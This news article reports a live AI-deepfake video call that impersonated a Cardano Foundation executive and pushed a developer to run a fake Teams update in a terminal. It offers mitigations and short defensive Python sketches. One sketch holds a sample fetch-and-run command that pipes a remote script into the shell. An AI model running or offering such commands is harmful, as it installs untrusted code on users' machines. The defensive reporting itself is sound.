Cardano Developer Warns After AI Deepfake Breaches Laptop

A Cardano ecosystem developer, known as Big Pey, narrowly avoided a full compromise after joining a live video call that used AI-generated deepfake video and voice to impersonate a Cardano Foundation executive. The caller instructed him to run an update to the Microsoft Teams client via terminal commands, which likely would have installed malware. The developer's laptop lost power mid-update, apparently interrupting the attack. Multiple other crypto professionals reported near-identical targeting, indicating a coordinated social-engineering campaign leveraging compromised accounts, Calendly invites, and Telegram messages. The incident underscores escalating risks to developers and infrastructure from highly convincing deepfakes and illustrates a practical attack vector that operational security teams must mitigate now.
What happened
A Cardano ecosystem developer, Big Pey, joined a scheduled call that convincingly impersonated Pierre Kaklamanos, Head of Digital Assets Adoption at the Cardano Foundation, using AI-generated video and voice. The call presented multiple realistic participants and a Microsoft Teams prompt claiming the client needed an update installed via terminal commands. The developer executed the commands, but his laptop powered off when its battery died, likely interrupting the payload installation. Within hours, other crypto professionals, including staff at DWF Labs and contacts amplified by Changpeng Zhao, reported near-identical attempts.
Technical details
The attack chain combined account compromise, social engineering, and live deepfake rendering. Key observable elements were:
- Initial contact through a previously trusted, now-compromised account, often followed by a Calendly invite or direct Telegram message.
- A live video call using AI-driven face and voice synthesis to impersonate a known executive, plus staged additional participants to increase legitimacy.
- An instruction to run an update via the Microsoft Teams client using terminal commands, the likely vector for deploying remote access tools or persistence mechanisms.
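One procedural guard against the last step is to never execute an "update" handed over during a live call, and instead verify its hash against a value published through an independent, trusted channel. A minimal sketch (the function name and the example strings are illustrative, not from the incident):

```python
import hashlib

def verify_update(script_bytes: bytes, expected_sha256: str) -> bool:
    """Refuse to run an update unless its SHA-256 matches a value
    confirmed out-of-band (e.g., a vendor's signed release page)."""
    actual = hashlib.sha256(script_bytes).hexdigest()
    return actual == expected_sha256.lower()

# A payload pasted into a live call will not match the hash
# published by the real vendor, so it is rejected.
payload = b"curl -fsSL https://example.com/update.sh | sh"
published_hash = hashlib.sha256(b"legitimate installer contents").hexdigest()
print(verify_update(payload, published_hash))  # False: do not execute
```

The check is deliberately dumb: it forces a human to consult a second channel, which is exactly the step the live-call pressure is designed to skip.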
Context and significance
This is a concrete evolution from recorded deepfakes to synchronous impersonation used in active compromise attempts. The technique removes many of the traditional red flags: visual familiarity, voice, and conversational context. FBI data from 2025 highlighted escalating losses: $20.9 billion lost to internet fraud, with $893 million tied to AI-enabled scams, framing this incident as part of a larger trend. For crypto ecosystems, where key material and developer machines are high-value targets, the risk model changes: identity checks based on trust and endpoint hygiene are no longer sufficient without procedural guards.
What to watch
Operational mitigations should be prioritized: enforce verification protocols for voice/video invites, ban execution of unvetted commands during live calls, require ephemeral VM or air-gapped devices for critical key operations, and accelerate multi-channel identity verification. Watch for similar campaigns targeting other blockchain teams and for tooling that simplifies live deepfake generation, which will lower attacker costs and increase frequency.
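The multi-channel verification mitigation above can be sketched as a one-time challenge code exchanged over a second, pre-established channel (the function names and the flow are an illustrative assumption, not a specific product):

```python
import secrets

def issue_challenge() -> str:
    """Generate a one-time code to send over a second channel
    (e.g., a phone number exchanged in person), never in the call itself."""
    return secrets.token_hex(4)

def verify_challenge(issued: str, spoken: str) -> bool:
    """Check the code read back by the counterparty on the call.
    Comparison is constant-time to avoid leaking partial matches."""
    return secrets.compare_digest(issued, spoken.strip().lower())
```

A deepfaked caller who only controls the video channel cannot read back a code delivered out-of-band, which makes the impersonation fail regardless of how convincing the synthesis is.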
"Moral of the story, be careful. Trust nothing, trust no one," warned Big Pey, reflecting a simple but urgent operational posture shift for developers and security teams.
Scoring Rationale
This incident demonstrates a notable escalation in attacker capabilities: live, synchronous deepfakes used to target developers and deploy malware. It is operationally significant for security teams and crypto projects but not yet a systemic industry paradigm shift.